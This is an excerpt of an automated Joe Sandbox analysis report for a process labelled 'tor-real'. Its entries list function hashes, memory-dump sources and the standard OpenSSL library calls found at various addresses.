                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeX509_i2d_$__stack_chk_failmemcmp
                                                                            • String ID:
                                                                            • API String ID: 3513203242-0
                                                                            • Opcode ID: 666a8580d7c7af06d8470913a13082b9999fd732ea4db7b499578b2f9852e820
                                                                            • Instruction ID: 4311b3d24785c7ee32f65b3568a3355ec18f20256234eed8103ba5635420e056
                                                                            • Opcode Fuzzy Hash: 666a8580d7c7af06d8470913a13082b9999fd732ea4db7b499578b2f9852e820
                                                                            • Instruction Fuzzy Hash: 162110B5A093019FC700DFA4D58474EBBF4AF89648F40892DE89497B00DB31E8898B92
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094777
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zallocR_put_error
                                                                            • String ID: A
                                                                            • API String ID: 2718799170-3554254475
                                                                            • Opcode ID: 5d67c39e365463238e1186fe2992385150898bbe21681da81d56b66bd31e9946
                                                                            • Instruction ID: 668cb2bfe34b567be959aa1bda81a5d628ec9e264a32957f3182c28acf8f5dc2
                                                                            • Opcode Fuzzy Hash: 5d67c39e365463238e1186fe2992385150898bbe21681da81d56b66bd31e9946
                                                                            • Instruction Fuzzy Hash: 056147756093059FCB00CFA8C19030AFBE0EF89754F198569ECA89B715E770E944DF92
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0B6D05
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0B6DDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeO_malloc
                                                                            • String ID: $A$P
                                                                            • API String ID: 1578198043-3278419925
                                                                            • Opcode ID: f7a960d224311375dfdfdeadf0591b1bd3bc5c65f1ac6e41aea131efaa7cb652
                                                                            • Instruction ID: e888e4fa8138de4c7a96e7c560ad21b20ceedd428e01a1f427611d90b021b35f
                                                                            • Opcode Fuzzy Hash: f7a960d224311375dfdfdeadf0591b1bd3bc5c65f1ac6e41aea131efaa7cb652
                                                                            • Instruction Fuzzy Hash: F04115B56083458FC700DF64C48579FBBE0BF84348F158D6DE898AB711D379E9488B52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P
                                                                            • API String ID: 0-307317852
                                                                            • Opcode ID: be17890bd63685f8ca02bacf3455dc8bb1d67081f470b05ca25e33168b829bc8
                                                                            • Instruction ID: 3cd895f9e2e3994302eee6fc29a15294647fdbf2ef9a6acceba8b232995e90e7
                                                                            • Opcode Fuzzy Hash: be17890bd63685f8ca02bacf3455dc8bb1d67081f470b05ca25e33168b829bc8
                                                                            • Instruction Fuzzy Hash: 264128B02087529BD3249F65C5947AEFBE4FB85308F50C91DE4988B740D779E589CF82
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0E48F2
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0E4965
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_malloc
                                                                            • String ID: A
                                                                            • API String ID: 2609694610-3554254475
                                                                            • Opcode ID: 1fa2353a14f2490ff03e8eb918f5fae3cb946200fd5a3e12bfcb0e11957e36bf
                                                                            • Instruction ID: ae457c4e922e46ec356d404a7e4c80bff7701c05ee28f26dfdaa94c5aca37a07
                                                                            • Opcode Fuzzy Hash: 1fa2353a14f2490ff03e8eb918f5fae3cb946200fd5a3e12bfcb0e11957e36bf
                                                                            • Instruction Fuzzy Hash: A8318B716083159FC700DFA8D48025EFBE0EF88359F10CA2DE9989B760D775E845CB96
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: A
                                                                            • API String ID: 2581946324-3554254475
                                                                            • Opcode ID: 74310918158e700f260c1b64311b3f4f6143fd2bd62fed2361f2573d4238d492
                                                                            • Instruction ID: b2db8b389708460014961cde0822eea4a7ebd39844adbf87dc1b7b67e68b4570
                                                                            • Opcode Fuzzy Hash: 74310918158e700f260c1b64311b3f4f6143fd2bd62fed2361f2573d4238d492
                                                                            • Instruction Fuzzy Hash: D8217CB15097119FE710CF54D88439BBBE0EF8434DF14886DE8A8AFA45D736D8858B81
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4C7B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4C83
                                                                            • EVP_DigestSign.LIBCRYPTO-1_1 ref: 6C0D4DA9
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4E3B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4E43
                                                                            • RSA_pkey_ctx_ctrl.LIBCRYPTO-1_1 ref: 6C0D4FDB
                                                                            • RSA_pkey_ctx_ctrl.LIBCRYPTO-1_1 ref: 6C0D5013
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: A_pkey_ctx_ctrlO_freeX_free$DigestSign
                                                                            • String ID: P
                                                                            • API String ID: 1404439906-3110715001
                                                                            • Opcode ID: e6b5fc359dfb5076f04cf8effa2cf96ee3d1d6eda7d12a691f8abf0746172214
                                                                            • Instruction ID: b97f953ccd986b1448e3ac493bdf5b461021425258754cfd293b13e204fd3b35
                                                                            • Opcode Fuzzy Hash: e6b5fc359dfb5076f04cf8effa2cf96ee3d1d6eda7d12a691f8abf0746172214
                                                                            • Instruction Fuzzy Hash: 16219EB01087419FD310DF25D48475FBBE0BB88368F118E1DE4E95B6A0C7B9A58A9F82
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DAA9B
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAA7
                                                                            • HMAC_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$O_freeR_put_error
                                                                            • String ID: A$P
                                                                            • API String ID: 3066917576-345673399
                                                                            • Opcode ID: 08ebc3b86f6c30aac3b9ef1a50f77874497405297c5b65ee679e2824f0d36f0b
                                                                            • Instruction ID: 83890e4ae39cfbca3d08337fb5e1cd1bda5b5b114a57fb31d88d7f3f5d93ef45
                                                                            • Opcode Fuzzy Hash: 08ebc3b86f6c30aac3b9ef1a50f77874497405297c5b65ee679e2824f0d36f0b
                                                                            • Instruction Fuzzy Hash: 76111671A093018FE350DF15D58475ABBF0AF84718FA5992DE4988BB50C779E8888B82
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DAA9B
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAA7
                                                                            • HMAC_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$O_freeR_put_error
                                                                            • String ID: D$P
                                                                            • API String ID: 3066917576-307317852
                                                                            • Opcode ID: 001e01cc622a91fd8fc4ad559f7865db7ba9fe4bb620757c684dca3574fcb021
                                                                            • Instruction ID: 8719a979c4aa7b8af7ea997f859a207e887afebf915bf284306c7784f0e46830
                                                                            • Opcode Fuzzy Hash: 001e01cc622a91fd8fc4ad559f7865db7ba9fe4bb620757c684dca3574fcb021
                                                                            • Instruction Fuzzy Hash: 98112871A09301CFD350DF15D18075EBBF0EF84758FA5992CE4988BB50C379E9898B86
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4B3A
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4B45
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4B5D
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4B8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free
                                                                            • String ID: A
                                                                            • API String ID: 3920316597-3554254475
                                                                            • Opcode ID: 973ceca8586ad455131d60e0f03b9e84616cac8bc7ef76468d00d481adab1d12
                                                                            • Instruction ID: a844d426dc860195472960f7dc52278e62b676a64fad91a80b12f61ab2f71d88
                                                                            • Opcode Fuzzy Hash: 973ceca8586ad455131d60e0f03b9e84616cac8bc7ef76468d00d481adab1d12
                                                                            • Instruction Fuzzy Hash: F911F3712487009FD700DFA4D48079EBBF0FF85369F61891CE6A8ABB50C739E5448B96
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4B8F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4C5F
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4C6E
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4C86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free
                                                                            • String ID: A
                                                                            • API String ID: 3920316597-3554254475
                                                                            • Opcode ID: 708489c26c4fd639e6e42f375563f7b9b1b6eee21c853443ef9ec26ddd0dfb72
                                                                            • Instruction ID: 0f2a0bee33aaf5ea01b2eec33264e0d7724eb566c10c464349fa544385b988cb
                                                                            • Opcode Fuzzy Hash: 708489c26c4fd639e6e42f375563f7b9b1b6eee21c853443ef9ec26ddd0dfb72
                                                                            • Instruction Fuzzy Hash: 3D0157712083009FD700DFA4D48035EBBF0EF85369F61891DE2A8ABB50C739D5448B96
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 28610519-3554254475
                                                                            • Opcode ID: 918b84e5ea3048b1f673dbdba83a6bb12237126ded04094d38ddf57a274a7bea
                                                                            • Instruction ID: 96ca64680f9003f749bf390d7d26a61aa3f5955082bc8007de628cef5223545d
                                                                            • Opcode Fuzzy Hash: 918b84e5ea3048b1f673dbdba83a6bb12237126ded04094d38ddf57a274a7bea
                                                                            • Instruction Fuzzy Hash: 7801D2B52487059FD3009FA4D08079EBBF0BF84358F61CE0DE1A85BB90C779A5498B86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 28610519-3554254475
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,00000000,?,6C0AF971), ref: 6C0BCF07
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,00000000,?,6C0AF971), ref: 6C0BCF16
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,00000000,?,6C0AF971), ref: 6C0BCF2D
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BCFB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlockD_write_lockH_deleteH_retrieve
                                                                            • String ID:
                                                                            • API String ID: 3040165603-0
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0BC6C9
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BC6D8
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1 ref: 6C0BC6EF
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC753
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlockD_write_lockH_deleteH_retrieve
                                                                            • String ID:
                                                                            • API String ID: 3040165603-0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: A
                                                                            • API String ID: 2581946324-3554254475
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0B6AB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: A
                                                                            • API String ID: 1457121658-3554254475
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A75E
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A77C
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_mallocR_put_error
                                                                            • String ID: A$w
                                                                            • API String ID: 2160744234-2979019740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$FileO_ctrl
                                                                            • String ID: -
                                                                            • API String ID: 3793654131-2547889144
                                                                            APIs
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0D050D
                                                                              • Part of subcall function 6C0A3510: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0A356C
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A359D
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A35C9
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A35EE
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3660
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3698
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_free$memcpy$O_malloc
                                                                            • String ID: :$P$j
                                                                            • API String ID: 2939898830-206217590
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_memdup$O_freememcmp
                                                                            • String ID: D$P
                                                                            • API String ID: 590648765-307317852
                                                                            • Opcode ID: 938af111bdf1c679cbba7ed515cedf21eeb836c65113bfe5bc401c47e8265f20
                                                                            • Instruction ID: ff977bc519b040841dc315531751e4d80f9f4666cb52dc2a01b0073bddeb856b
                                                                            • Opcode Fuzzy Hash: 938af111bdf1c679cbba7ed515cedf21eeb836c65113bfe5bc401c47e8265f20
                                                                            • Instruction Fuzzy Hash: 0E2104B0609300CFD714DF25C48475ABBE0BF88718F058A6DE9A89B352C734A604CFD2
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2C56
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2C71
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2C89
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DB5
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DD0
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DE8
                                                                            • memcpy.MSVCRT ref: 6C0D3013
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3026
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3031
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free$memcpy
                                                                            • String ID: i
                                                                            • API String ID: 1711549817-3865851505
                                                                            • Opcode ID: 7d36923c18e0c759855c8800534cb72cb3f1be6fe43e958fe4c0133b80aa9fb2
                                                                            • Instruction ID: dd98e311143a3167f088b49342da1b4ffefcd45d52ec9c30b5d2b51da57d659c
                                                                            • Opcode Fuzzy Hash: 7d36923c18e0c759855c8800534cb72cb3f1be6fe43e958fe4c0133b80aa9fb2
                                                                            • Instruction Fuzzy Hash: 16112AB46087008FD3209F65D08476EBBF0BF49709F818E1DE8999BB10DB35F8458B56
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094E65
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094EB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zallocR_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 2718799170-3696090935
                                                                            • Opcode ID: 1d19164bb7814a0789e546d7b43a49af6e5f04a8632ccbfde37d9283ff3ff7a5
                                                                            • Instruction ID: fb552e7acf1da0912f6d41201af128b120544bf529e6d4a7baee7716e4119ade
                                                                            • Opcode Fuzzy Hash: 1d19164bb7814a0789e546d7b43a49af6e5f04a8632ccbfde37d9283ff3ff7a5
                                                                            • Instruction Fuzzy Hash: F5016DB010A301DFEB04CF55D98430B7BE1AB80718F14C95CE8A88F785D7BAC4949BA2
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DB5
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DD0
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DE8
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3055
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3060
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0D31E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free$__stack_chk_fail
                                                                            • String ID: i
                                                                            • API String ID: 2301565740-3865851505
                                                                            • Opcode ID: 7d01a3755899a2b9e98be8b61496d7b5e2aa127336156cb84b192377bacb20d3
                                                                            • Instruction ID: ed9d7e4f9ca0772ffbf903549fb3021b9d8b72cf7ec6ace261e40b9ad823e881
                                                                            • Opcode Fuzzy Hash: 7d01a3755899a2b9e98be8b61496d7b5e2aa127336156cb84b192377bacb20d3
                                                                            • Instruction Fuzzy Hash: EA0116B56487008FD3209F60E08076EBBF1BF89708F55CA0DD4892BB20C735E4458B46
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2775
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2790
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D27A8
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27D6
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: i
                                                                            • API String ID: 306345296-3865851505
                                                                            • Opcode ID: dc3c9ce576cb171431d7c6a1068309742610c301f2e7413524dee4972f6976c1
                                                                            • Instruction ID: 1fb19d83be39b658e88d2ecb4ac0b844f40d9ef4f8b3368a43ca1e426b8a9c0c
                                                                            • Opcode Fuzzy Hash: dc3c9ce576cb171431d7c6a1068309742610c301f2e7413524dee4972f6976c1
                                                                            • Instruction Fuzzy Hash: C80164716083008FC3209F64E080BAEBBF1BF85328F45CA0DE498ABA60C731E854CB06
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4581
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D459C
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D45B4
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D45F7
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4602
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: i
                                                                            • API String ID: 306345296-3865851505
                                                                            • Opcode ID: b5ac01d01eaba8f65d11d127ba4baf612cb274de50bb68763eba03954c72cbe3
                                                                            • Instruction ID: 1c9845ece672c102dd0c23aff14546f40812b305d2dff72837f1cdf1ffa923d2
